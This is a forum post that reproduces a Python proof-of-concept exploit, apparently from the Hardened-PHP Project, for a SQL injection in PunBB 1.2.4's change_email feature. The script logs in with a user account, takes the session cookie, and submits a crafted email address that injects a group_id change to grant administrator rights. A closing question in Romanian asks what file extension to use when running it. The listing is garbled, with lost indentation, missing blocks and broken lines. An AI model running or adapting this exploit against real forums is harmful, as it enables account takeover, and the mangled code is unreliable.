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punBB exploit

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# Proof of concept code from the Hardened-PHP Project



# -= PunBB 1.2.4 =-

# change_email SQL injection exploit


# user-supplied data within the database is still user-supplied data



import urllib

import getopt

import sys

import string

__argv__ = sys.argv

def banner():

print "PunBB 1.2.4 - change_email SQL injection exploit"

print "Copyright © 2005 Hardened-PHP Projectn"

def usage():


print "Usage:n"

print " $ ./punbb_change_email.py [options]n"

print " -h http_url url of the punBB forum to exploit"

print " f.e. http://www.forum.net/punBB/"

print " -u username punBB forum useraccount"

print " -p password punBB forum userpassword"

print " -e email email address where the admin leve activation email

is sent" print " -d domain catch all domain to catch

"some-SQL-Query"@domain emails" print ""


def main():


opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:D:")

except getopt.GetoptError:


if len(__argv__) < 10:


username = None

password = None

email = None

domain = None

host = None

for o, arg in opts:

if o == "-h":

host = arg

if o == "-u":

username = arg

if o == "-p":

password = arg

if o == "-e":

email = arg

if o == "-d":

domain = arg

# Printout banner


# Check if everything we need is there

if host == None:

print "[-] need a host to connect to"


if username == None:

print "[-] username needed to continue"


if password == None:

print "[-] password needed to continue"


if email == None:

print "[-] email address needed to continue"


if domain == None:

print "[-] catch all domain needed to continue"


# Retrive cookie

params = {

'req_username' : username,

'req_password' : password,

'form_sent' : 1


wclient = urllib.URLopener()

print "[+] Connecting to retrieve cookie"

req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))

info = req.info()

if 'set-cookie' not in info:

print "[-] Unable to retrieve cookie... something is wrong"


cookie = info['set-cookie']

cookie = cookie[:string.find(cookie, ';')]

print "[+] Cookie found - extracting user_id"

user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]

print "[+] User-ID: %d" % (int(user_id))

wclient.addheader('Cookie', cookie);

email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email,

'@')+1:] + ',"',' append = 'group_id='1'

email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain

params = {

'req_new_email' : email,

'form_sent' : 1


print "[+] Connecting to request change email"

req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,


print "[+] Done... Now wait for the email. Log into punBB, go to the link in the

email and become admin"

if __name__ == "__main__":


Chestia e k mam pierdut...se deschide cu python...dar ce extensie sa ii pun la exploit?

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